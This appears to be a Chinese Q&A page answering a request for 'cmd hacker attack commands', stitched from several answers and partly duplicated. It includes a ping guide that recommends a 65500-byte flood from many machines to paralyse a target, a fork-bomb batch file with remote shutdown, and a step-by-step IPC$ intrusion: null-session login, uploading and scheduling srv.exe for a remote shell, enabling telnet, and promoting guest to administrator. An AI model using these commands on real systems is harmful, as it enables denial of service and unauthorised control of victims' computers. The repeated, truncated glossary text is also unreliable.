ping命令详解 对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-wz timeout] destination-listOptions:-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.不停的ping地方主机,直到你按下Control-C。此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。-a Resolve addresses to hostnames.解析计算机NetBios名。示例:C:\>ping -a 192.168.1.21Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Ping statistics for 192.168.1.21:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0ms从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。-n count Number of echo requests to send.发送count指定的Echo数据包数。在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:C:\>ping -n 50 202.103.96.68Pinging 202.103.96.68 with 32 bytes of data:Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Request timed out.………………Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Ping statistics for 202.103.96.68:Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:Minimum = 40ms, Maximum = 51ms, Average = 46ms从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。-l size Send buffer size.定义echo数据包大小。在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)C:\>ping -l 65500 -t 192.168.1.21Pinging 192.168.1.21 with 65500 bytes of data:Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254………………这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。-f Set Don't Fragment flag in packet.在数据包中发送“不要分段”标志。在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。-i TTL Time To Live.指定TTL值在对方的系统里停留的时间。此参数同样是帮助你检查网络运转情况的。-v TOS Type Of Service.将“服务类型”字段设置为 tos 指定的值。-r count Record route for count hops.在“记录路由”字段中记录传出和返回数据包的路由。在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:C:\>ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)Pinging 202.96.105.101 with 32 bytes of data:Reply from 202.96.105.101: bytes=32 time=10ms TTL=249Route: 202.107.208.187 ->202.107.210.214 ->61.153.112.70 ->61.153.112.89 ->202.96.105.149 ->202.96.105.97 ->202.96.105.101 ->202.96.105.150 ->61.153.112.90Ping statistics for 202.96.105.101:Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 10ms, Maximum = 10ms, Average = 10ms从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。-s count Timestamp for count hops.指定 count 指定的跃点数的时间戳。此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。-j host-list Loose source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。-k host-list Strict source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。-w timeout Timeout in milliseconds to wait for each reply.指定超时间隔,单位为毫秒。此参数没有什么其他技巧。ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]"DefaultTTL"=dword:000000ff255---FF128---8064----4032----20 好了,ping命令也基本上完全讲解完了
1.新建文档 输入 :startstart cmdgoto start后缀名改为bat远程连接127.0.0.1 (任意ip)将文件放在他的电脑里或输入shutdown -s -r我只是个孩子 只懂这点shutdown -s -t 60 表示一分钟后关机 taskkill -f -im cmd.exe表示关闭cmd
高级cmd攻击命令是什么意思?
CMD命令net use ipipc$ " " /user:" " 建立IPC空链接net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: ipc$ 登陆后映射对方C:到本地为H:net use ipipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名 密码 /add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名 查看帐户的属性net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start 查看开启了哪些服务net start 服务名 开启服务;(如:net start telnet, net start schedule)net stop 服务名 停止某服务net time 目标ip 查看对方时间net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名 暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码 更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
cmd命令大全
cmd相信大家都有所了解,鉴于它的强大功能,我想您一定也想了解它吧。要知道,cmd命令是每个黑客必备的能力之一啊。听到这里,您有没有很激动呢?如果有的话,就一起跟我来了解一下这神秘有强大的命令行吧,下面我就为您带来其相关内容~一起来看看吧!命令提示符Windows 命令提示符(cmd.exe)是 Windows NT 下的一个用于运行 Windows 控制面板程序或某些 DOS 程序的shell程序;或在 Windows CE 下只用于运行控制面板程序的外壳程序。简介Windows 命令提示符(cmd.exe)是 Windows NT 下的一个用于运行 Windows 控制面板程序或某些 DOS 程序的shell程序;或在 Windows CE 下只用于运行控制面板程序的外壳程序。那么该如何使用这个命令进入文件夹呢?1.开始->运行->CMD2.进入某个磁盘,直接盘符代号:如D:,不用CD 命令切换3.进入除根录以下的文件夹 cd 文件夹路径 例如我要进入 E:/Program Files/PHP 就输入 E:回车注: 不 能在一打开CMD的时候运行CD E:/Program Files/PHP,需要先进入磁盘(若一打开CMD的时候运行CD E:/Program Files/PHP,目录不会切换,但在下次输入盘符的时候进入上一次希望进入的目录,如输入E:会直接进入E:/Program Files/PHP)输入 CD "Program Files"/PHP 回车注:如果需要在dos下查看带有空格的文件夹(如Documents and settings,Program files等文件夹),可以有下面两种处理方法:1、给文件夹加引号。 如C:/>cd c:/"documents and settings"这样的好处是多长的文件名都可以全部显示出来。2、由于一般情况下DOS系统只支持8.3格式的文件名,因此在DOS下遇到长文件名的文件夹时,取前面6位,然后在后面加上一个~号和数字1。 你可以输入C:/>cd c:/docume~1 进入Documents and settings文件夹。当截取前面的6个字母之后出现重复时,可以将1改为2,依此类推。3.进入上一层目录 CD ../4.显示目录下的文件及了目录 dir以上就是我大哥的关于cmd如何进入文件夹的相关内容了,相信一定以及解决了您的问题。如果你还有什么关于cmd的问题,请尽可能的登陆我们土巴兔网站寻求帮助,我们网站能够提供给您最权威的的解决方案,保证能够解决您的问题!关于cmd进文件夹的问题,我就介绍到这里了
跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有
一 相关命令 建立空连接:net use \IPipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)建立非空连接:net use \IPipc$ "用户名" /user:"密码"(同样有3个空格)映射默认共享:net use z: \IPc$ "密码" /user:"用户名"(即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \IPc$删除一个ipc$连接net use \IPipc$ /del删除共享映射net use c: /del 删除映射的c盘,其他盘类推net use * /del 删除全部,会有提示要求按y确认提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.二 经典入侵模式1. C:>net use \127.0.0.1IPC$ "" /user:"admintitrators"这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。2. C:>copy srv.exe \127.0.0.1admin$先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。3. C:>net time \127.0.0.1查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。4. C:>at \127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)5. C:>net time \127.0.0.1再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。6. C:>telnet 127.0.0.1 99这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了7.C:>copy ntlm.exe \127.0.0.1admin$用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。8. C:WINNTsystem32>ntlm输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组10. C:>net user guest /active:yes将对方的Guest用户激活11. C:>net user guest 1234将Guest的密码改为1234,或者你要设定的密码12. C:>net localgroup administrators guest /add将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).ipc$经典入侵步骤:1、net use \ipipc$ 密码 /user:用户名2、copy 文件名 \ipc$3、net time \ip4、at \ip 时间 命令5、入侵成功,连接你的肉鸡常用的网络命令net user 查看用户列表net user 用户名 密码 /add 添加用户net user 用户名 密码 更改用户密码net localgroup administrators 用户名 /add 添加用户到管理组net user 用户名 /delete 删除用户net user 用户名 查看用户的基本情况net user 用户名 /active:no 禁用该用户net user 用户名 /active:yes 启用该用户net share 查看计算机IPC$共享资源net share 共享名 查看该共享的情况net share 共享名=路径 设置共享。例如 net share c$=c:net share 共享名 /delete 删除IPC$共享net stop lanmanserver 关闭ipc$和默认共享依赖的服务net use 查看IPC$连接情况net use \ipipc$ "密码" /user:"用户名" ipc$连接net use \ipipc$ /del 删除一个连接net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘net use z: /delnet time \ip 查看远程计算机上的时间copy 路径:文件名 \ip共享名复制文件到已经ipc$连接的计算机上net view ip 查看计算机上的共享资源at 查看自己计算机上的计划作业at \ip 查看远程计算机上的计划作业at \ip 时间 命令(注意加盘符) 在远程计算机上加一个作业at \ip 计划作业ID /delete 删除远程计算机上的一个计划作业at \ip all /delete 删除远程计算机上的全部计划作业at \ip time "echo 5 > c:t.txt" 在远程计算机上建立文本文件t.txt;下面纯手打,上面是度娘给的taskkill /im 进程名 停止运行tasklisy 查看运行进程ipconfig 查看本机IPmd创建文件夹rd删除文件夹echo off >.txt|exit 添加文本echo 内容 >>.txt给文本添加内容copy复制文件net user 用户名 密码/add 创建一个普通账号 net localgroup administrators 用户名 /add 把账户加入超级用户组
Dos命令:需要手工在命令行状态下输入的网络命令。是一种面向磁盘的操作命令,主要包括目录操作类命令、磁盘操作类命令、文件操作类命令和其它命令。 https://baike.baidu.com/item/DOS%E5%91%BD%E4%BB%A4/5143255?fr=aladdin一:黑客:1)要有英语基础,:这是基础,每天要注意修炼。2)知道常用的黑客术语,3.)网络安全术语,如tcp/ip协议,APR协议4.)熟练掌握DOS命令和黑客工具,ping,netstat,net命令等,工具有远程入侵,5.)主流的编程语言以及脚本。(1.网页脚本,即网页代码,例如HTML,CSS,JAVAscript,asp,php,xml等(2.解释型语言,即perl,python,REBOL,Ruby等,也称为脚本语言,用于和底层的操作系统沟通,效果是效率差,源代码外露,一般用于网页服务器中,不用来开发软件产品。(3.混合型语言,Java和c#,处于解释型和编译型之间。(4.编译型语言,Java,c/c++。(5.汇编语言,即最接近于硬件的语言,但是用这个语言的人少。程序语言学习的顺序建议如下:Javascrip->解释型语言->混和型语言->编译型语言->汇编语言。书上这样给的。但是根据我们学习的安排进程,应该是c语言->c++->网页脚本语言->解释型语言->混合型语言->编译型语言->汇编语言肉鸡:任黑客宰割的计算机。木马:表面上伪装成正常的程序,一旦运行,入侵者就会获取系统的整个控制权限。网页木马:表面上伪装成普通的网页文件,或者将正常的网页文件插进去恶意代码,一旦访问这些网络文件,网页木马就会利用对方的系统或者浏览器存在的漏洞自动将木马的服务器端配置好然后下载到访问者的计算机上自动执行。挂马:这个是在别人的网站文件里放网页木马,或者将代码潜入到对方的正常网页文件里,使得浏览器中马。后门:当黑客控制了目标主机后,还可以在对方系统植入特定程序,或者修改某些设置。并且这些变化是从表面上很难被察觉。黑客可以使用相应的程序或者方法与该计算机建立连接,重新控制这台计算机。所谓后门便是小偷配置了主人家的钥匙。随时随地就可以进出主人房间不被发现。IPC$共享“命名管道”资源,即为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获着相应权限,在远程管理计算机和查看计算机的共享资源时使用。,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。不过要注意一点:建立 IPC$ 连接的操作会在 Event Log 中留下记录,不管你是否登录成功https://baike.baidu.com/item/%E7%A9%BA%E8%BF%9E%E6%8E%A5/1993355?fr=aladdin&fromid=9482475&fromtitle=ipc%24shell 命令执行环境。webshell是以ASP,PHP,JSP或者CGI等网页文件形式存在的一种命令执行环境,即一种网页后门。“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。溢出:大致分为两种,1.堆溢出2.栈溢出。溢出即是缓冲区溢出,即程序对接收的输入数据没有执行有效的检测而导致错误。后是程序崩溃,或者执行攻击者的任务。缓冲区溢出漏洞主要是由于许多软件没有对缓冲区进行检查而造成。具体溢出就看看下面链接吧。https://baike.baidu.com/item/%E6%BA%A2%E5%87%BA/1775951?fr=aladdin1.ip:互联网中,利用IP地址,可以找到目标主机。想要攻击某互联网主机,就先确定目标主机的域名或者IP地址。IP即是主机编址方式,每个IP地址长32bit,每一个bit是4个字节。IP的表示方法是'点分十进制表示法'ip信息包括 IP地址,子网掩码,默认网关和DNS。此4个只有协同合作,用户便可以访问互联网并被互联网中的计算机所访问(采用静态IP地址接入互联网时,ISP(服务商)为用户提供全部的IP信息)。企业网络使用的IP地址,由提供互联网的服务商ISP分配。私有的IP地址则由网络管理员自由分配。但是是网络内部所有计算机的IP地址不能相同,否则。发生IP地址冲突,导致网络连接失败。子网掩码是与IP地址相结合的使用的一种技术,作用有两种,1.确定地址的网络号和主机号。2.用于将一个大的IP网络划分为若干个小子网络。默认网关:是指一台主机找到可用的网关,就把数据包发送给默认指定的网关。由一个网关向另一个网关发送信息时,也必须经过一道关口,这道关口就是网关。DNS:DNS服务用于将用户的域名请求转换为IP地址。若企业网络没有提供DNS服务,则DNS服务器的IP地址应是ISP的DNS服务器。如果企业网络自己提供的dns服务,则dns服务器的IP地址就是内部DNS服务器的IP地址.IP 地址的分类互联网中的每个接口都有唯一的IP地址与其对应,该地址也是有一定结构。以下是IP的https://baike.baidu.com/item/IP%E5%9C%B0%E5%9D%80/150859A类的IP地址由一个字节的网络地址和3个字节的主机地址组成。网络地址的最高位必须是0,可用A类网络有126个,每个网络能容纳1亿多个主机地址范围1.0.0.1~126.255.255.254.B类IP地址:2个字节的网络地址和两个字节的主机地址组成,网络地址的最高位必须是10,可用的网络有16382个,每个网络能容纳6万多个主机,地址范围有128.0.0.1~191.255.255.254.C类的IP地址:由3个字节的网络地址和1个字节的主机地址。组成网络地址最高位是110,可用的网络达209万,每个网络能容纳254个主机,地址范围是192.0.0.1~223.255.255.254D类的地址用于多点广播,第一个字节以1110开始,它是一个专门保留的地址,并不指向特定的网络。多点广播地址用来一次寻址一组计算机,他标识共享同一协议的一组计算机,地址范围为224.0.0.1~239.255.255.254E类的IP地址以11110开始,为了将来使用而保留。全零(0.0.0.0)地址对应于当前主机;全1的IP地址(255.255.255.255)是当前子网的广播地址,地址范围为240.0.0.1~255.255.255.254注意 全零和全1的地址禁止使用,全零代表本网络,而全一是广播地址(在CISCO上可以使用全零地址)常用的是ABC这三类地址。2.认识进程所谓进程便是程序在计算机上的一次执行活动。开始运行一个程序时,就启动一个进程。进程还分为系统进程和用户进程。凡是用于完成操作系统的各种功能的进程就是系统进程,且时处于运动状态下的操作系统本身;用户进程就是所有用户启动的进程。进程是操作系统进行资源分配的单位。3.端口是计算机和外界通信交流的出口。硬件领域的端口又称为接口,如USB端口,串行端口等。软件领域端口一般指互联网中面向连接服务和无连接服务的通信协议端口,是一种抽象的软件结构,包括一些数据结构和i/o(基本输入输出)缓冲区。端口是传输层的内容,是面向连接的,对应网络上常见的一些服务,这些常见的服务可以划分为TCP端口(面向连接,如打电话)和使用UDP端口(无连接,如写信)两种。4.虚拟机环境黑客无论是在测试和学习黑客工具的操作方法还是在攻击时候,不会拿实体计算机来尝试,而是在计算机中搭建虚拟环境,即在自己已在的系统中,利用虚拟机创建一个内在的系统,该系统可以与外界独立,但与已经存在的系统建立网络关系,从而方便使用某些黑客工具进行攻击模拟,并且一旦黑客工具对虚拟机造成破坏,也会很快就会恢复,不会影响本来的计算机系统,使得操作更安全。二:1.window系统的命令行服务器管理 和网络管理是系统和网络管理者的主要内容。window系统本身 就带着一些病毒和受残损的文件,常使用户无法正常工作。但是熟练掌握命令行的使用方法,能保障计算机系统的安全性能。2.Dos系统dos是一组控制计算机 工作的程序,专门用来管理计算机中各种软件,硬件资源,负责监视和 控制计算机的全部工作过程。向用户提供了一整套使用 计算机系统的 命令和方法,还向用户提供了一套组织和应用磁盘上信息的方法。dos的 功能:执行命令和程序:当用户键入合法命令和文件名后,dos就根据文件的存储地址到内存 或外存上查找用户所需的程序,并根据用户的 要求使得CPU运行,否则则出现出错信息 ,告诉用户服务,在这里,cpu承担了使用者,计算机,应用程序三者之间的中间人。内存管理:分配内存空间,保护内存,使得任何一个程序所占的空间不遭到破坏,同硬件相配合,可以设置一个最佳的操作环境。设备管理:为用户提供使用各种输入或输出的设备(如键盘,磁盘,打印机,和显示器等)的操作方法。可以通过dos方便的实现内存和外存之间的数据传送和存取。文件管理;为用户提供一种简单的存取和管理信息方法。通过dos管理文件目录,为文件分配磁盘存储空间,建立,复制,删除,读/写和检索各类文件等。作业管理:作业是指用户提交给计算机系统的一个独立的计算任务,包括源程序,数据和相关命令。作业管理是对用户提交的诸多作业进行管理,包括作业的组织,控制和 调度等。文件与目录:文件是存储于外存储器中具有名字的一组相关信息集合,在dos下的所有程序和数据都是以文件形式存入磁盘。自己编制的存入磁盘的程序就是文件。执行dos 外部的命令就调用此命令文件的过程。内部命令隐藏在dos的io.sys和msdos.sys中,当dos启动计算机时候使用者输入一个dos 命令时候,该指令先交由command.com分析,所以command被称为命令处理器,其功能就是判断使用者 所输入的指令是内部命令还是外部命令。若是内部,交给io.sys或msdos.sys处理,反之则到磁盘上找寻该档案,即执行该指令。WiFiWiFi实际上是一种高频无线电信号,它是 一种可将个人计算机。手机等终端以无线方式互相连接的技术。无线网络在无线局域网上的范畴内是指“无线相容性认证".实质上是一种商业认证。也是无线联网技术。以前通过网线连接计算机,而无线保真则是通过无线电波来联网。常见的就是用一个无线路由器,在这个无线路由器的电波覆盖的有效范围内就可以采用无线保真方式进行联网,若无线路由器连接了一条ADSL的线路或者别的上网线路,电脑的无线路由器的参数设置。192.168.1.1连接问题:手机连不上路由器,可能是手机连接该无线路由器的无线信号,并且在手机上保存了无线网络的配置文件,但是改变了无线路由器的加密方式或者密钥。手机不能自动连接到该信号,需要先删除原有的无线配置文件再重新连接。若是手机无线显示已连接,但是不能上网,可能是手机的IP地址等参数配置错误。推荐使用默认的自动获取默认的IP地址。作者:笑雅雅链接:https://www.jianshu.com/p/e51947fe4241来源:简书 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
最简单的 ping ip -t -l 65500
Dos命令:需要手工在命令行状态下输入的网络命令。是一种面向磁盘的操作命令,主要包括目录操作类命令、磁盘操作类命令、文件操作类命令和其它命令。 https://baike.baidu.com/item/DOS%E5%91%BD%E4%BB%A4/5143255?fr=aladdin一:黑客:1)要有英语基础,:这是基础,每天要注意修炼。2)知道常用的黑客术语,3.)网络安全术语,如tcp/ip协议,APR协议4.)熟练掌握DOS命令和黑客工具,ping,netstat,net命令等,工具有远程入侵,5.)主流的编程语言以及脚本。(1.网页脚本,即网页代码,例如HTML,CSS,JAVAscript,asp,php,xml等(2.解释型语言,即perl,python,REBOL,Ruby等,也称为脚本语言,用于和底层的操作系统沟通,效果是效率差,源代码外露,一般用于网页服务器中,不用来开发软件产品。(3.混合型语言,Java和c#,处于解释型和编译型之间。(4.编译型语言,Java,c/c++。(5.汇编语言,即最接近于硬件的语言,但是用这个语言的人少。程序语言学习的顺序建议如下:Javascrip->解释型语言->混和型语言->编译型语言->汇编语言。书上这样给的。但是根据我们学习的安排进程,应该是c语言->c++->网页脚本语言->解释型语言->混合型语言->编译型语言->汇编语言肉鸡:任黑客宰割的计算机。木马:表面上伪装成正常的程序,一旦运行,入侵者就会获取系统的整个控制权限。网页木马:表面上伪装成普通的网页文件,或者将正常的网页文件插进去恶意代码,一旦访问这些网络文件,网页木马就会利用对方的系统或者浏览器存在的漏洞自动将木马的服务器端配置好然后下载到访问者的计算机上自动执行。挂马:这个是在别人的网站文件里放网页木马,或者将代码潜入到对方的正常网页文件里,使得浏览器中马。后门:当黑客控制了目标主机后,还可以在对方系统植入特定程序,或者修改某些设置。并且这些变化是从表面上很难被察觉。黑客可以使用相应的程序或者方法与该计算机建立连接,重新控制这台计算机。所谓后门便是小偷配置了主人家的钥匙。随时随地就可以进出主人房间不被发现。IPC$共享“命名管道”资源,即为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获着相应权限,在远程管理计算机和查看计算机的共享资源时使用。,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。 NT/2000 在提供了 ipc$ 功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享 (c$,d$,e$ …… ) 和系统目录 winnt 或 windows(admin$) 共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。不过要注意一点:建立 IPC$ 连接的操作会在 Event Log 中留下记录,不管你是否登录成功https://baike.baidu.com/item/%E7%A9%BA%E8%BF%9E%E6%8E%A5/1993355?fr=aladdin&fromid=9482475&fromtitle=ipc%24shell 命令执行环境。webshell是以ASP,PHP,JSP或者CGI等网页文件形式存在的一种命令执行环境,即一种网页后门。“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。溢出:大致分为两种,1.堆溢出2.栈溢出。溢出即是缓冲区溢出,即程序对接收的输入数据没有执行有效的检测而导致错误。后是程序崩溃,或者执行攻击者的任务。缓冲区溢出漏洞主要是由于许多软件没有对缓冲区进行检查而造成。具体溢出就看看下面链接吧。https://baike.baidu.com/item/%E6%BA%A2%E5%87%BA/1775951?fr=aladdin1.ip:互联网中,利用IP地址,可以找到目标主机。想要攻击某互联网主机,就先确定目标主机的域名或者IP地址。IP即是主机编址方式,每个IP地址长32bit,每一个bit是4个字节。IP的表示方法是'点分十进制表示法'ip信息包括 IP地址,子网掩码,默认网关和DNS。此4个只有协同合作,用户便可以访问互联网并被互联网中的计算机所访问(采用静态IP地址接入互联网时,ISP(服务商)为用户提供全部的IP信息)。企业网络使用的IP地址,由提供互联网的服务商ISP分配。私有的IP地址则由网络管理员自由分配。但是是网络内部所有计算机的IP地址不能相同,否则。发生IP地址冲突,导致网络连接失败。子网掩码是与IP地址相结合的使用的一种技术,作用有两种,1.确定地址的网络号和主机号。2.用于将一个大的IP网络划分为若干个小子网络。默认网关:是指一台主机找到可用的网关,就把数据包发送给默认指定的网关。由一个网关向另一个网关发送信息时,也必须经过一道关口,这道关口就是网关。DNS:DNS服务用于将用户的域名请求转换为IP地址。若企业网络没有提供DNS服务,则DNS服务器的IP地址应是ISP的DNS服务器。如果企业网络自己提供的dns服务,则dns服务器的IP地址就是内部DNS服务器的IP地址.IP 地址的分类互联网中的每个接口都有唯一的IP地址与其对应,该地址也是有一定结构。以下是IP的https://baike.baidu.com/item/IP%E5%9C%B0%E5%9D%80/150859A类的IP地址由一个字节的网络地址和3个字节的主机地址组成。网络地址的最高位必须是0,可用A类网络有126个,每个网络能容纳1亿多个主机地址范围1.0.0.1~126.255.255.254.B类IP地址:2个字节的网络地址和两个字节的主机地址组成,网络地址的最高位必须是10,可用的网络有16382个,每个网络能容纳6万多个主机,地址范围有128.0.0.1~191.255.255.254.C类的IP地址:由3个字节的网络地址和1个字节的主机地址。组成网络地址最高位是110,可用的网络达209万,每个网络能容纳254个主机,地址范围是192.0.0.1~223.255.255.254D类的地址用于多点广播,第一个字节以1110开始,它是一个专门保留的地址,并不指向特定的网络。多点广播地址用来一次寻址一组计算机,他标识共享同一协议的一组计算机,地址范围为224.0.0.1~239.255.255.254E类的IP地址以11110开始,为了将来使用而保留。全零(0.0.0.0)地址对应于当前主机;全1的IP地址(255.255.255.255)是当前子网的广播地址,地址范围为240.0.0.1~255.255.255.254注意 